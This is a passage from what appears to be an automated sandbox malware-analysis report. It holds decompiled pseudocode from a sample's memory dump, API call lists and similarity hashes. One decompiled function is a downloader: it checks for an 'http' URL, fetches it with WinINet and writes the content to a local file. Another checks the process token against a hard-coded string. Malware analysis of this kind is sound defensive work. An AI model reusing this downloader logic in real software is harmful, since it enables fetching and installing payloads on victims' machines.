                                                                                                                                                                        												E00407EDB(_a8, _t184, 1,  &_v60, 0, 0, _v20,  &_v32); // executed
                                                                                                                                                                        											}
                                                                                                                                                                        										}
                                                                                                                                                                        										LocalFree(_t184);
                                                                                                                                                                        										LocalFree(_v20);
                                                                                                                                                                        										LocalFree(_v24);
                                                                                                                                                                        										LocalFree(_t173);
                                                                                                                                                                        									}
                                                                                                                                                                        									LocalFree(_a4); // executed
                                                                                                                                                                        									LocalFree(_v8);
                                                                                                                                                                        									LocalFree(_v12); // executed
                                                                                                                                                                        									L19:
                                                                                                                                                                        									LocalFree(_v16);
                                                                                                                                                                        									_t105 = 1;
                                                                                                                                                                        									L20:
                                                                                                                                                                        									return _t105;
                                                                                                                                                                        								}
                                                                                                                                                                        								LocalFree(_v8);
                                                                                                                                                                        								LocalFree(_v12);
                                                                                                                                                                        								L9:
                                                                                                                                                                        								_push(0xfffffffc);
                                                                                                                                                                        								L10:
                                                                                                                                                                        								_pop(1);
                                                                                                                                                                        								goto L19;
                                                                                                                                                                        							}
                                                                                                                                                                        							LocalFree(_v8);
                                                                                                                                                                        							goto L9;
                                                                                                                                                                        						}
                                                                                                                                                                        						_push(0xfffffffd);
                                                                                                                                                                        						goto L10;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t133 = _t55 - _t164;
                                                                                                                                                                        					__eflags = _t133;
                                                                                                                                                                        					_t127 = _t133 >> 1;
                                                                                                                                                                        					if(_t133 >= 0) {
                                                                                                                                                                        						goto L5;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t105 = 0xfffffffe;
                                                                                                                                                                        					goto L20;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t105 = _t53 | 0xffffffff;
                                                                                                                                                                        				goto L20;
                                                                                                                                                                        			}










































                                                                                                                                                                        0x00409919
                                                                                                                                                                        0x0040991e
                                                                                                                                                                        0x00409920
                                                                                                                                                                        0x00409924
                                                                                                                                                                        0x00409939
                                                                                                                                                                        0x0040993d
                                                                                                                                                                        0x0040993f
                                                                                                                                                                        0x00409941
                                                                                                                                                                        0x00409953
                                                                                                                                                                        0x0040996f
                                                                                                                                                                        0x00409974
                                                                                                                                                                        0x0040997b
                                                                                                                                                                        0x0040997d
                                                                                                                                                                        0x00409991
                                                                                                                                                                        0x0040999c
                                                                                                                                                                        0x004099a4
                                                                                                                                                                        0x004099b8
                                                                                                                                                                        0x004099be
                                                                                                                                                                        0x004099c5
                                                                                                                                                                        0x004099c7
                                                                                                                                                                        0x004099e8
                                                                                                                                                                        0x004099f3
                                                                                                                                                                        0x004099fb
                                                                                                                                                                        0x00409a18
                                                                                                                                                                        0x00409a1a
                                                                                                                                                                        0x00409a36
                                                                                                                                                                        0x00409a44
                                                                                                                                                                        0x00409a4b
                                                                                                                                                                        0x00409a54
                                                                                                                                                                        0x00409a5d
                                                                                                                                                                        0x00409a66
                                                                                                                                                                        0x00409a6f
                                                                                                                                                                        0x00409a78
                                                                                                                                                                        0x00409a81
                                                                                                                                                                        0x00409a8a
                                                                                                                                                                        0x00409a96
                                                                                                                                                                        0x00409a9b
                                                                                                                                                                        0x00409aa7
                                                                                                                                                                        0x00409aaf
                                                                                                                                                                        0x00409ab2
                                                                                                                                                                        0x00409ab5
                                                                                                                                                                        0x00409ab7
                                                                                                                                                                        0x00409ab8
                                                                                                                                                                        0x00409ab9
                                                                                                                                                                        0x00409abe
                                                                                                                                                                        0x00409ac1
                                                                                                                                                                        0x00409ad4
                                                                                                                                                                        0x00409ae1
                                                                                                                                                                        0x00409ae5
                                                                                                                                                                        0x00409aea
                                                                                                                                                                        0x00409afc
                                                                                                                                                                        0x00409aff
                                                                                                                                                                        0x00409b01
                                                                                                                                                                        0x00409b08
                                                                                                                                                                        0x00409b0d
                                                                                                                                                                        0x00409b13
                                                                                                                                                                        0x00409b17
                                                                                                                                                                        0x00409b1d
                                                                                                                                                                        0x00409b20
                                                                                                                                                                        0x00409b32
                                                                                                                                                                        0x00409b3d
                                                                                                                                                                        0x00409b4e
                                                                                                                                                                        0x00409b50
                                                                                                                                                                        0x00409b52
                                                                                                                                                                        0x00409b69
                                                                                                                                                                        0x00409b6b
                                                                                                                                                                        0x00409b6d
                                                                                                                                                                        0x00409b84
                                                                                                                                                                        0x00409b89
                                                                                                                                                                        0x00409b6d
                                                                                                                                                                        0x00409b8d
                                                                                                                                                                        0x00409b96
                                                                                                                                                                        0x00409b9f
                                                                                                                                                                        0x00409ba6
                                                                                                                                                                        0x00409ba6
                                                                                                                                                                        0x00409baf
                                                                                                                                                                        0x00409bb8
                                                                                                                                                                        0x00409bc1
                                                                                                                                                                        0x00409bc7
                                                                                                                                                                        0x00409bca
                                                                                                                                                                        0x00409bd0
                                                                                                                                                                        0x00409bd3
                                                                                                                                                                        0x00409bd6
                                                                                                                                                                        0x00409bd6
                                                                                                                                                                        0x00409a1f
                                                                                                                                                                        0x004099cc
                                                                                                                                                                        0x004099cc
                                                                                                                                                                        0x004099d2
                                                                                                                                                                        0x004099d4
                                                                                                                                                                        0x004099d4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004099d4
                                                                                                                                                                        0x004099cc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004099cc
                                                                                                                                                                        0x0040997f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040997f
                                                                                                                                                                        0x00409945
                                                                                                                                                                        0x00409945
                                                                                                                                                                        0x00409947
                                                                                                                                                                        0x00409949
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040994d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040994d
                                                                                                                                                                        0x00409926
                                                                                                                                                                        0x00000000

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: x[m
                                                                                                                                                                        • API String ID: 0-3488577920
                                                                                                                                                                        • Opcode ID: 823b0d16673dee3de935993e7c46dd941d23d6ac542f114209c353ad5b495304
                                                                                                                                                                        • Instruction ID: d553b19b407f17417f5105702fe08a0418c2ec115b386657b372b4e652bae7b9
                                                                                                                                                                        • Opcode Fuzzy Hash: 823b0d16673dee3de935993e7c46dd941d23d6ac542f114209c353ad5b495304
                                                                                                                                                                        • Instruction Fuzzy Hash: FA81D5B1900205BFDB00DBA6DD45DAE7BB9EB84310B00493AF914F72D1DB78AD11CBA9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _check_managed_app.LIBCMTD ref: 004134AC
                                                                                                                                                                        • __heap_init.LIBCMTD ref: 004134B6
                                                                                                                                                                          • Part of subcall function 00422620: HeapCreate.KERNEL32(00000000,00001000,00000000,?,004134BB,00000001), ref: 00422636
                                                                                                                                                                        • _fast_error_exit.LIBCMTD ref: 004134C4
                                                                                                                                                                          • Part of subcall function 00413610: ___crtExitProcess.LIBCMTD ref: 00413634
                                                                                                                                                                        • __mtinit.LIBCMTD ref: 004134CC
                                                                                                                                                                        • _fast_error_exit.LIBCMTD ref: 004134D7
                                                                                                                                                                        • __RTC_Initialize.LIBCMTD ref: 004134E9
                                                                                                                                                                        • __amsg_exit.LIBCMTD ref: 00413500
                                                                                                                                                                        • ___crtGetEnvironmentStringsA.LIBCMTD ref: 00413513
                                                                                                                                                                        • ___setargv.LIBCMTD ref: 0041351D
                                                                                                                                                                        • __amsg_exit.LIBCMTD ref: 00413528
                                                                                                                                                                        • __setenvp.LIBCMTD ref: 00413530
                                                                                                                                                                        • __amsg_exit.LIBCMTD ref: 0041353B
                                                                                                                                                                        • __cinit.LIBCMTD ref: 00413545
                                                                                                                                                                        • __amsg_exit.LIBCMTD ref: 0041355A
                                                                                                                                                                        • __wincmdln.LIBCMTD ref: 00413562
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __amsg_exit$___crt_fast_error_exit$CreateEnvironmentExitHeapInitializeProcessStrings___setargv__cinit__heap_init__mtinit__setenvp__wincmdln_check_managed_app
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1259877414-0
                                                                                                                                                                        • Opcode ID: 00a0afeaad1b4fafdd9e5251d42d89f04396b4629597290ad4fc375a040151d5
                                                                                                                                                                        • Instruction ID: 0f1e660c31b9fec308a46fc5c459b10c93befc3b333bb24cdea645fe2f35eac8
                                                                                                                                                                        • Opcode Fuzzy Hash: 00a0afeaad1b4fafdd9e5251d42d89f04396b4629597290ad4fc375a040151d5
                                                                                                                                                                        • Instruction Fuzzy Hash: 4941C8B1D00318BBDB10AFA2DD067DEB6B5AB14718F10412EF41597282E77D96808B9A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _check_managed_app.LIBCMTD ref: 004134AC
                                                                                                                                                                        • __heap_init.LIBCMTD ref: 004134B6
                                                                                                                                                                          • Part of subcall function 00422620: HeapCreate.KERNEL32(00000000,00001000,00000000,?,004134BB,00000001), ref: 00422636
                                                                                                                                                                        • _fast_error_exit.LIBCMTD ref: 004134C4
                                                                                                                                                                          • Part of subcall function 00413610: ___crtExitProcess.LIBCMTD ref: 00413634
                                                                                                                                                                        • __mtinit.LIBCMTD ref: 004134CC
                                                                                                                                                                        • _fast_error_exit.LIBCMTD ref: 004134D7
                                                                                                                                                                        • __RTC_Initialize.LIBCMTD ref: 004134E9
                                                                                                                                                                        • __amsg_exit.LIBCMTD ref: 00413500
                                                                                                                                                                        • ___crtGetEnvironmentStringsA.LIBCMTD ref: 00413513
                                                                                                                                                                        • ___setargv.LIBCMTD ref: 0041351D
                                                                                                                                                                        • __amsg_exit.LIBCMTD ref: 00413528
                                                                                                                                                                        • __setenvp.LIBCMTD ref: 00413530
                                                                                                                                                                        • __amsg_exit.LIBCMTD ref: 0041353B
                                                                                                                                                                        • __cinit.LIBCMTD ref: 00413545
                                                                                                                                                                        • __amsg_exit.LIBCMTD ref: 0041355A
                                                                                                                                                                        • __wincmdln.LIBCMTD ref: 00413562
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __amsg_exit$___crt_fast_error_exit$CreateEnvironmentExitHeapInitializeProcessStrings___setargv__cinit__heap_init__mtinit__setenvp__wincmdln_check_managed_app
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1259877414-0
                                                                                                                                                                        • Opcode ID: 1ae0cede8a6f80fa2b0e897c4d02645d5987a066f0932666652f4bbf2efc4084
                                                                                                                                                                        • Instruction ID: d791b14cbc55d7fd5126e6317dd736716c75130935513ae69eaa218fc0ddf6fe
                                                                                                                                                                        • Opcode Fuzzy Hash: 1ae0cede8a6f80fa2b0e897c4d02645d5987a066f0932666652f4bbf2efc4084
                                                                                                                                                                        • Instruction Fuzzy Hash: 6231B5F1E00314BAEB10AFB2A9027DE7660AB1070DF10412FE91957282F67996818A5B
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 71%
                                                                                                                                                                        			E00408495(WCHAR* __ecx, WCHAR* __edx, WCHAR* _a4) {
                                                                                                                                                                        				long _v8;
                                                                                                                                                                        				WCHAR* _v12;
                                                                                                                                                                        				long _v16;
                                                                                                                                                                        				void _v2064;
                                                                                                                                                                        				void* _t32;
                                                                                                                                                                        				void* _t35;
                                                                                                                                                                        				signed int _t36;
                                                                                                                                                                        				void* _t39;
                                                                                                                                                                        				void* _t42;
                                                                                                                                                                        				void* _t44;
                                                                                                                                                                        				int _t47;
                                                                                                                                                                        				int _t53;
                                                                                                                                                                        				void* _t55;
                                                                                                                                                                        				void* _t56;
                                                                                                                                                                        				signed int _t58;
                                                                                                                                                                        				void* _t69;
                                                                                                                                                                        				WCHAR* _t71;
                                                                                                                                                                        				void* _t72;
                                                                                                                                                                        				signed short* _t73;
                                                                                                                                                                        				void* _t75;
                                                                                                                                                                        
                                                                                                                                                                        				_v12 = __edx;
                                                                                                                                                                        				_t71 = __ecx;
                                                                                                                                                                        				_t56 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        				if( *((short*)(__ecx)) != 0x68) {
                                                                                                                                                                        					L15:
                                                                                                                                                                        					LocalFree(_t56);
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t32 = 0x74;
                                                                                                                                                                        				if( *((intOrPtr*)(__ecx + 2)) != _t32 ||  *((intOrPtr*)(__ecx + 4)) != _t32 ||  *((short*)(__ecx + 6)) != 0x70) {
                                                                                                                                                                        					goto L15;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_v16 =  *(__ecx + 8) & 0x0000ffff;
                                                                                                                                                                        					_t35 =  *((intOrPtr*)( *0x40e18c))(__ecx,  *0x40e3ec);
                                                                                                                                                                        					_t69 = 0;
                                                                                                                                                                        					_v8 = 0x2f;
                                                                                                                                                                        					_t8 = _t35 + 6; // 0x6
                                                                                                                                                                        					_t73 = _t8;
                                                                                                                                                                        					_t36 =  *_t73 & 0x0000ffff;
                                                                                                                                                                        					_t58 = _t36;
                                                                                                                                                                        					if(_t36 == _v8) {
                                                                                                                                                                        						L7:
                                                                                                                                                                        						lstrlenW(_t56);
                                                                                                                                                                        						_t39 = InternetOpenW(L"qwrqrwrqwrqwr", 0, 0, 0, 0); // executed
                                                                                                                                                                        						_v8 = _t39;
                                                                                                                                                                        						if(_t39 == 0) {
                                                                                                                                                                        							goto L15;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t61 =  ==  ? 0x84c00000 : 0x84400000;
                                                                                                                                                                        						_t42 = InternetOpenUrlW(_v8, _t71, _v12,  *((intOrPtr*)( *0x40e08c))(0), _v12,  ==  ? 0x84c00000 : 0x84400000); // executed
                                                                                                                                                                        						_t72 = _t42;
                                                                                                                                                                        						if(_t72 == 0) {
                                                                                                                                                                        							goto L15;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t44 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 0x8000000, 0); // executed
                                                                                                                                                                        						_t75 = _t44;
                                                                                                                                                                        						if(_t75 == 0xffffffff) {
                                                                                                                                                                        							goto L15;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t47 = InternetReadFile(_t72,  &_v2064, 0x800,  &_v8); // executed
                                                                                                                                                                        						while(_t47 != 0) {
                                                                                                                                                                        							if(_v8 == 0) {
                                                                                                                                                                        								FindCloseChangeNotification(_t75); // executed
                                                                                                                                                                        								LocalFree(_t56);
                                                                                                                                                                        								return 1;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t53 = WriteFile(_t75,  &_v2064, _v8,  &_v16, 0); // executed
                                                                                                                                                                        							if(_t53 == 0) {
                                                                                                                                                                        								goto L15;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t47 = InternetReadFile(_t72,  &_v2064, 0x800,  &_v8); // executed
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L15;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t55 = 0;
                                                                                                                                                                        					do {
                                                                                                                                                                        						_t69 = _t69 + 1;
                                                                                                                                                                        						 *(_t55 + _t56) = _t58;
                                                                                                                                                                        						_t55 = _t69 + _t69;
                                                                                                                                                                        						_t58 =  *(_t55 + _t73) & 0x0000ffff;
                                                                                                                                                                        					} while (_t58 != _v8);
                                                                                                                                                                        					goto L7;
                                                                                                                                                                        				}
                                                                                                                                                                        			}























                                                                                                                                                                        0x004084ad
                                                                                                                                                                        0x004084b0
                                                                                                                                                                        0x004084b8
                                                                                                                                                                        0x004084ba
                                                                                                                                                                        0x004085f8
                                                                                                                                                                        0x004085f9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004085ff
                                                                                                                                                                        0x004084c2
                                                                                                                                                                        0x004084c7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004084e2
                                                                                                                                                                        0x004084ec
                                                                                                                                                                        0x004084f5
                                                                                                                                                                        0x004084f7
                                                                                                                                                                        0x004084f9
                                                                                                                                                                        0x00408500
                                                                                                                                                                        0x00408500
                                                                                                                                                                        0x00408503
                                                                                                                                                                        0x00408506
                                                                                                                                                                        0x0040850c
                                                                                                                                                                        0x00408522
                                                                                                                                                                        0x00408523
                                                                                                                                                                        0x00408539
                                                                                                                                                                        0x0040853b
                                                                                                                                                                        0x00408540
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408561
                                                                                                                                                                        0x00408574
                                                                                                                                                                        0x00408576
                                                                                                                                                                        0x0040857a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408596
                                                                                                                                                                        0x00408598
                                                                                                                                                                        0x0040859d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004085b6
                                                                                                                                                                        0x004085f4
                                                                                                                                                                        0x004085be
                                                                                                                                                                        0x00408607
                                                                                                                                                                        0x0040860e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408616
                                                                                                                                                                        0x004085d6
                                                                                                                                                                        0x004085da
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004085f2
                                                                                                                                                                        0x004085f2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004085f4
                                                                                                                                                                        0x0040850e
                                                                                                                                                                        0x00408510
                                                                                                                                                                        0x00408510
                                                                                                                                                                        0x00408511
                                                                                                                                                                        0x00408515
                                                                                                                                                                        0x00408518
                                                                                                                                                                        0x0040851c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408510

                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 00408523
                                                                                                                                                                        • InternetOpenW.WININET(qwrqrwrqwrqwr,00000000,00000000,00000000,00000000), ref: 00408539
                                                                                                                                                                        • InternetOpenUrlW.WININET(0000002F,?,00408819,00000000), ref: 00408574
                                                                                                                                                                        • CreateFileW.KERNEL32(00408819,40000000,00000000,00000000,00000002,08000000,00000000), ref: 00408596
                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00000800,0000002F), ref: 004085B6
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,00000073,00000000), ref: 004085D6
                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00000800,00000000), ref: 004085F2
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004085F9
                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(00000000), ref: 00408607
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0040860E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileInternet$FreeLocalOpenRead$ChangeCloseCreateFindNotificationWritelstrlen
                                                                                                                                                                        • String ID: qwrqrwrqwrqwr$y@
                                                                                                                                                                        • API String ID: 1501804763-4056631227
                                                                                                                                                                        • Opcode ID: 2efbc42d44f6ec5ca4160c273d464a785a5d876e109b975a63a0bab6d59c1f12
                                                                                                                                                                        • Instruction ID: 1aaf66e6ff826a0af1a1f58395baf02585259993efb391a5facff1777f096ed2
                                                                                                                                                                        • Opcode Fuzzy Hash: 2efbc42d44f6ec5ca4160c273d464a785a5d876e109b975a63a0bab6d59c1f12
                                                                                                                                                                        • Instruction Fuzzy Hash: 4241BE70900115BEEB149BA5CE49EBAB3B8EB44300F00853AE551B72D1EBB4AE54DB68
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenW.KERNEL32(006D5B38,?,?,?,?,?,?,?,?,?,?,?,004058D7,?,?,?), ref: 00406137
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,?,?,004058D7,?,?), ref: 0040615C
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,004058D7,?,?,?), ref: 00406221
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
                                                                                                                                                                          • Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
                                                                                                                                                                          • Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004058D7,?,?,?), ref: 0040622B
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,004058D7,?,?,?,00000000,00000000,00000000), ref: 00406270
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,004058D7,?,?,?,00000000,00000000,00000000), ref: 004062C7
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,004058D7,?,?,?,00000000,00000000,00000000), ref: 004062CE
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,004058D7,?,?,?,00000000,00000000,00000000), ref: 00406325
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,004058D7,?,?,?,00000000,00000000,00000000), ref: 0040632F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Local$Free$lstrlen$Alloc$Global
                                                                                                                                                                        • String ID: 8[m
                                                                                                                                                                        • API String ID: 2878369382-3212178496
                                                                                                                                                                        • Opcode ID: 88be271c9a3ae40306a79d0cf913d625e6cf91e891778e6da8720978225ce7ad
                                                                                                                                                                        • Instruction ID: ff6bad65333e8fe1a3c55b3bcf1dec483b74064a970dacde523e554a8e1a11d4
                                                                                                                                                                        • Opcode Fuzzy Hash: 88be271c9a3ae40306a79d0cf913d625e6cf91e891778e6da8720978225ce7ad
                                                                                                                                                                        • Instruction Fuzzy Hash: 78A1A872504301ABDB14DF65DD8096BBBF5FF88300F01492DFA59A72A0D775E820CBAA
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 60%
                                                                                                                                                                        			E0040A0BE() {
                                                                                                                                                                        				long _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                        				int _t20;
                                                                                                                                                                        				int _t24;
                                                                                                                                                                        				int _t28;
                                                                                                                                                                        				void* _t35;
                                                                                                                                                                        				union _TOKEN_INFORMATION_CLASS _t38;
                                                                                                                                                                        
                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                        				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v12) == 0) {
                                                                                                                                                                        					L8:
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t38 = 1;
                                                                                                                                                                        				_t20 = GetTokenInformation(_v12, 1, 0, _v8,  &_v8); // executed
                                                                                                                                                                        				if(_t20 != 0 || GetLastError() == 0x7a) {
                                                                                                                                                                        					_t35 =  *((intOrPtr*)( *0x40e094))(0x40, _v8);
                                                                                                                                                                        					_t24 = GetTokenInformation(_v12, _t38, _t35, _v8,  &_v8); // executed
                                                                                                                                                                        					if(_t24 == 0) {
                                                                                                                                                                        						goto L8;
                                                                                                                                                                        					}
                                                                                                                                                                        					_v16 = _v16 & 0x00000000;
                                                                                                                                                                        					_push( &_v16);
                                                                                                                                                                        					_push( *_t35);
                                                                                                                                                                        					if( *((intOrPtr*)( *0x40e058))() == 0) {
                                                                                                                                                                        						goto L8;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t28 = lstrcmpiW( *0x40e464, _v16); // executed
                                                                                                                                                                        					if(_t28 != 0) {
                                                                                                                                                                        						_t38 = 0;
                                                                                                                                                                        					}
                                                                                                                                                                        					GlobalFree(_t35);
                                                                                                                                                                        					return _t38;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					goto L8;
                                                                                                                                                                        				}
                                                                                                                                                                        			}











                                                                                                                                                                        0x0040a0c4
                                                                                                                                                                        0x0040a0e1
                                                                                                                                                                        0x0040a169
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040a169
                                                                                                                                                                        0x0040a0f7
                                                                                                                                                                        0x0040a0fc
                                                                                                                                                                        0x0040a100
                                                                                                                                                                        0x0040a11f
                                                                                                                                                                        0x0040a12d
                                                                                                                                                                        0x0040a131
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040a133
                                                                                                                                                                        0x0040a13f
                                                                                                                                                                        0x0040a140
                                                                                                                                                                        0x0040a146
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040a156
                                                                                                                                                                        0x0040a15a
                                                                                                                                                                        0x0040a15c
                                                                                                                                                                        0x0040a15c
                                                                                                                                                                        0x0040a15f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,?,?,iqroq5112542785672901323), ref: 0040A0D6
                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,iqroq5112542785672901323), ref: 0040A0DD
                                                                                                                                                                        • GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,?,iqroq5112542785672901323), ref: 0040A0FC
                                                                                                                                                                        • GetLastError.KERNEL32(?,iqroq5112542785672901323), ref: 0040A102
                                                                                                                                                                        • GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,?,iqroq5112542785672901323), ref: 0040A12D
                                                                                                                                                                        • lstrcmpiW.KERNEL32(00000000,?,iqroq5112542785672901323), ref: 0040A156
                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 0040A15F
                                                                                                                                                                        Strings
                                                                                                                                                                        • iqroq5112542785672901323, xrefs: 0040A0CB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Token$InformationProcess$CurrentErrorFreeGlobalLastOpenlstrcmpi
                                                                                                                                                                        • String ID: iqroq5112542785672901323
                                                                                                                                                                        • API String ID: 2598388208-2937663778
                                                                                                                                                                        • Opcode ID: 4d261efb80a07d971c1b4c2ed8a49a1184e64f21143a526caa496802c9409c4c
                                                                                                                                                                        • Instruction ID: 15eb1b3bc6c873a00f883c6e6f8e066a9c9a871e93fd9db043f72c5c5a2fc382
                                                                                                                                                                        • Opcode Fuzzy Hash: 4d261efb80a07d971c1b4c2ed8a49a1184e64f21143a526caa496802c9409c4c
                                                                                                                                                                        • Instruction Fuzzy Hash: 51118135900215FBDB119BE6DE44EAFBBB8EB48750F040475E900F61A0DB74DE24DB66
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 52%
                                                                                                                                                                        			E004090DC(void* __ecx, intOrPtr* _a4) {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				int _v12;
